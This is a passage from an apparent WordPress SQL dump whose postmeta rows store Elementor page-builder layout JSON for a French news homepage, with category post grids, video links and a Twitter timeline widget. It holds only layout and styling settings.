Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2336,754,'_elementor_version','0.4'),(2337,754,'_elementor_css','a:3:{s:4:\"time\";i:1509369930;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2338,755,'_elementor_edit_mode','builder'),(2339,755,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2340,755,'_elementor_version','0.4'),(2342,756,'_elementor_edit_mode','builder'),(2343,756,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.